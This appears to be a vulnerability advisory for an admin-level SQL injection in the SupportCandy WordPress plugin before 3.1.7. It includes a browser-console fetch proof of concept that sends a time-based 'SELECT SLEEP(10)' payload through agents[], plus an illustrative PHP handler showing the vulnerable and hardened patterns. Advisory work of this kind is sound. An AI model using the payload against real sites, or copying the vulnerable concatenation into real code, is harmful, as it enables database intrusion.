WordPress Plugin Vulnerabilities

SupportCandy < 3.1.7 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.

Proof of Concept

1. As an admin user, go to Support > Support Agents > Leaves. Click on a date in the calendar to open the "Add new" modal.
2. Run the following code in the browser console and note that the response is delayed by 10 seconds:

// Multipart POST to admin-ajax.php; the agents[] field carries "SELECT SLEEP(10)"
// and the _ajax_nonce is read from the open "Add new" modal on the page.
await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=---------------------------400140094426688388811654736371",
    },
    "body": `-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"agents[]\"\r\n\r\nSELECT SLEEP(10)\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"is-recurring\"\r\n\r\n0\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwpsc_set_add_agent_leaves\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"_ajax_nonce\"\r\n\r\n${document.getElementsByName('_ajax_nonce')[0].value }\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"dateSelected\"\r\n\r\n2023-05-16\r\n-----------------------------400140094426688388811654736371--\r\n`,
    "method": "POST",
});
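To show the defect the description refers to and how it is closed, here is an added illustration of a WordPress AJAX handler that puts an array parameter into a SQL IN clause. It is not SupportCandy's code; the function names, table name, nonce action and capability are assumptions.

```php
<?php
// Added illustration, not the plugin's own code. Function and table names,
// the nonce action and the capability are hypothetical.

// Vulnerable pattern: request values are concatenated straight into SQL, so an
// element such as "SELECT SLEEP(10)" becomes a subquery and is executed.
function example_add_agent_leaves_vulnerable() {
    global $wpdb;
    $agents = isset( $_POST['agents'] ) ? (array) $_POST['agents'] : array();
    // BAD: no type check, no escaping, no placeholders.
    $sql = "SELECT id FROM {$wpdb->prefix}example_agents WHERE id IN (" . implode( ',', $agents ) . ")";
    return $wpdb->get_col( $sql );
}

// Hardened pattern: nonce and capability checks, type coercion of every element,
// and a prepared statement with one placeholder per element.
function example_add_agent_leaves_hardened() {
    global $wpdb;

    // Reject requests without the nonce issued to this user (default query arg is _ajax_nonce).
    check_ajax_referer( 'example_agent_leaves_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // absint() turns any non-numeric element (including SQL text) into 0, which is then dropped.
    $agents = isset( $_POST['agents'] ) ? array_map( 'absint', (array) $_POST['agents'] ) : array();
    $agents = array_values( array_filter( $agents ) );
    if ( empty( $agents ) ) {
        wp_send_json_error( 'no valid agents selected', 400 );
    }

    // Only accept an ISO date for dateSelected; anything else is rejected.
    $date = isset( $_POST['dateSelected'] ) ? sanitize_text_field( $_POST['dateSelected'] ) : '';
    if ( ! preg_match( '/^\d{4}-\d{2}-\d{2}$/', $date ) ) {
        wp_send_json_error( 'invalid date', 400 );
    }

    // One %d placeholder per element; $wpdb->prepare() accepts the values as an array.
    $placeholders = implode( ',', array_fill( 0, count( $agents ), '%d' ) );
    $sql = $wpdb->prepare(
        "SELECT id FROM {$wpdb->prefix}example_agents WHERE id IN ($placeholders)",
        $agents
    );
    return $wpdb->get_col( $sql );
}
```

With the hardened handler, the PoC request above yields an empty agents list and a 400 response instead of a ten-second delay.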

Affects Plugins

Fixed in 3.1.7

Classification

Type
SQLI

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2023-05-22
Added
2023-05-24
Last Updated
2023-05-24